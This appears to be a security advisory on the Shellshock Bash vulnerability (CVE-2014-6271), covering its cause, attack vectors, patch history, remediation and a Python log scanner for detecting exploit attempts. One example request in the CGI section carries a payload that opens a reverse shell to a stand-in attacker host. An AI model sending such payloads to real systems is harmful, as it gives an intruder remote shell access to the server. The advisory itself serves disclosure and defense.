Overview
CVE-2014-6271, nicknamed "Shellshock," is a critical remote code execution vulnerability in the GNU Bash shell, present in all Bash versions through 4.3. Bash allows exporting shell functions to child processes via environment variables; a bug in the parsing code causes Bash to also execute any trailing commands appended after the function definition. Because many network services — web servers running CGI scripts, DHCP clients, SSH with ForceCommand, and others — pass user-controlled data to Bash via environment variables, this parsing flaw allowed unauthenticated remote attackers to execute arbitrary OS commands against these services.
Disclosed September 24, 2014, Shellshock triggered mass exploitation within hours. The initial patch was incomplete, spawning a chain of additional CVEs (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) over the following week. Bash had carried this flaw for approximately 25 years, introduced in Bash version 1.14 circa 1989.
What Is GNU Bash?
GNU Bash (Bourne-Again Shell) is the default command interpreter on virtually every Linux distribution, macOS (through Catalina), and many embedded Unix-based systems. It is used interactively by users and invoked by countless system services, scripts, and network daemons — making any exploitable parsing bug in Bash a high-impact finding with an enormous attack surface.
Affected Versions
| Software | Vulnerable Range | Fixed Version |
|---|---|---|
| GNU Bash | 1.14 through 4.3 patch 24 | 4.3 patch 25 (initial), patch 26/27 (complete) |
| GNU Bash 4.2 | All prior patches | 4.2 patch 48+ |
| GNU Bash 4.1 | All prior patches | 4.1 patch 12+ |
| GNU Bash 3.x | All versions | Vendor backport patches required |
All major Linux distributions (RHEL, Ubuntu, Debian, SUSE, CentOS) and macOS (through OS X Mavericks 10.9.5) were affected. Embedded devices running Bash — routers, NAS devices, IP cameras — were often permanently unpatched.
Technical Details
Root Cause: Trailing Command Execution After Function Export
Bash supports exporting functions to child processes via environment variables. The intended syntax is:
```
env 'FUNC=() { echo hello; }' bash -c 'FUNC'
```
When a child Bash process starts and encounters an environment variable containing what appears to be a function definition (`() { ... }`), it imports it as a shell function. The vulnerability is that Bash continues parsing and executing any code that follows the closing brace of the function definition:
```
env 'FUNC=() { ignored; }; echo SHELLSHOCK' bash -c 'echo test'
```
This prints `SHELLSHOCK` — the trailing `echo SHELLSHOCK` executes during Bash initialization, before the intended command. An attacker who can control an environment variable passed to a Bash subprocess can inject arbitrary shell commands.
Attack Vectors
CGI Scripts (Most Common): Web servers executing CGI scripts pass HTTP headers as environment variables to the script. An attacker sends:
```
GET /cgi-bin/test.cgi HTTP/1.1
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1
```
The web server sets `HTTP_USER_AGENT` to the attacker's string; when the CGI script invokes Bash (directly or via `/bin/sh`), the trailing command executes as the web server's user — typically `www-data` or `apache`.
DHCP Client:
A malicious DHCP server can inject commands via DHCP option fields that dhclient passes to Bash hooks. Any device that receives DHCP responses from an untrusted network (a rogue AP, a compromised router) is exploitable.
SSH ForceCommand:
SSH servers configured with ForceCommand (restricting users to a specific command) are vulnerable if the shell is Bash — an attacker can still execute arbitrary commands via SSH environment variable injection (SSH_ORIGINAL_COMMAND).
Other vectors: Git hooks, mail delivery agents, various sysadmin utilities that invoke Bash with environment variables.
Why the Initial Patch Was Insufficient
The Bash 4.3 patch 25 (first fix) added a check to reject environment variables containing the () { pattern. However, researchers quickly found ways to bypass it using alternative patterns, leading to CVE-2014-7169 within 24 hours of the original disclosure. A complete fix required multiple iterations across patches 25–27.
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — exploitable via any service that passes user input to Bash via env vars |
| Privileges Required | None — HTTP headers, DHCP packets require no authentication |
| Primary vector | CGI scripts on Apache/nginx, DHCP clients |
| Code executes as | The web server process user, DHCP client daemon user, or SSH session |
Discovery
Stéphane Chazelas, a Unix and Linux system administrator, discovered the vulnerability in September 2014 while investigating Bash's behavior with environment variable function exports. He reported it to Red Hat's security team (Florian Weimer) on September 12, 2014. Red Hat coordinated disclosure with other vendors and CERT/CC. The public disclosure on September 24, 2014 included a coordinated patch release from major Linux distributions — but exploitation began within hours regardless.
Exploitation Context
- Mass exploitation began within hours of disclosure — automated scanning and exploitation tools appeared the same day
- Botnets: Multiple botnets incorporated Shellshock for propagation and payload delivery within days
- Targeted attacks: APT groups including those attributed to China and Iran were observed using Shellshock for initial access in 2014–2015
- Long tail: Embedded devices (routers, NAS, cameras) running outdated Bash remain vulnerable indefinitely; Shellshock exploitation was still observed in threat intelligence reports years after disclosure
- CISA KEV: Added January 28, 2022 — over seven years after disclosure — confirming active exploitation continued through 2021
Remediation
Recommended Actions
- Update Bash to the fully patched version for your distribution. The initial patch 25 is insufficient; ensure you have patch 26 or 27 (or the equivalent backport). Verify with `bash --version` and check vendor errata.
- Disable CGI scripts that invoke Bash if not required. Prefer languages or interpreters that do not use environment variable function import (Python, Perl, PHP).
- DHCP clients: Ensure `dhclient` uses a patched Bash version. Consider static IP assignment for systems on untrusted networks.
- Embedded and IoT devices: Identify all devices running Bash. Apply firmware updates where available; network-isolate devices that cannot be updated.
- Audit for post-exploitation indicators: Shellshock exploits often install backdoors, cron jobs, or reverse shells. Review CGI access logs for `() {` patterns; audit crontabs and `authorized_keys` for unauthorized entries.
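As an added example (not part of the original advisory), the following Python scans access-log lines for the `() {` function-definition prefix in the two request headers that a CGI server copies into `HTTP_REFERER` and `HTTP_USER_AGENT`, tying the CGI vector above to the log-review step. It assumes the Apache/nginx "combined" log format; the sample lines are constructed, not real traffic.

```python
import re
from dataclasses import dataclass

# Apache/nginx "combined" format: the two quoted trailing fields are the Referer and
# User-Agent headers, which a CGI server exports as HTTP_REFERER / HTTP_USER_AGENT.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
    r' "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock payloads begin with a function-definition prefix: "()" then "{", with
# optional whitespace between them. Searching anywhere in the header value also
# catches variants that pad or prefix the payload.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

@dataclass
class Hit:
    ip: str
    ts: str
    request: str
    env_var: str       # CGI environment variable the header would populate
    header_value: str

def cgi_env_name(header: str) -> str:
    """Map an HTTP header name to its CGI variable name (RFC 3875: HTTP_ + upper, '-' -> '_')."""
    return "HTTP_" + header.upper().replace("-", "_")

def scan_line(line: str):
    m = COMBINED_RE.match(line)
    if not m:
        return []          # not a combined-format line; nothing to inspect
    hits = []
    for header, field in (("User-Agent", "ua"), ("Referer", "referer")):
        value = m.group(field)
        if FUNC_DEF_RE.search(value):
            hits.append(Hit(m["ip"], m["ts"], m["req"], cgi_env_name(header), value))
    return hits

def scan_log(lines):
    return [h for line in lines for h in scan_line(line)]

# Constructed sample lines (not real traffic): one benign request, two hostile ones.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '203.0.113.9 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "(){ :;}; echo probe" "curl/7.38"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h.ts} {h.ip} {h.request} -> {h.env_var}={h.header_value!r}")
```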
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2014-6271 |
| Vendor / Product | GNU — Bourne-Again Shell (Bash) |
| NVD Published | 2014-09-24 |
| NVD Last Modified | 2025-10-22 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 — Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) |
| CISA KEV Added | 2022-01-28 |
| CISA KEV Deadline | 2022-07-28 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2014-09-12 | Stéphane Chazelas discovers the vulnerability and reports it to Red Hat's Florian Weimer |
| 2014-09-24 | Coordinated disclosure; Bash 4.3 patch 25 released; CVE-2014-6271 published; mass exploitation begins within hours |
| 2014-09-24 | Initial patch found incomplete — trailing string execution still possible (leads to CVE-2014-7169) |
| 2014-09-25 | CVE-2014-7169 published for the bypass; Bash 4.3 patch 26 released |
| 2014-09-26 | Additional bypass variants CVE-2014-7186 and CVE-2014-7187 identified |
| 2014-09-29 | Bash 4.3 patch 27 released with more comprehensive fix |
| 2022-01-28 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-07-28 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2014-6271 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Red Hat Security Advisory — CVE-2014-6271 (Shellshock) | Vendor Advisory |
| oss-security: Remote code execution through bash (Stéphane Chazelas disclosure) | Security Research |
| Shellshock Test Script | Security Research |
| CWE-78 — Improper Neutralization of Special Elements used in an OS Command | Weakness Classification |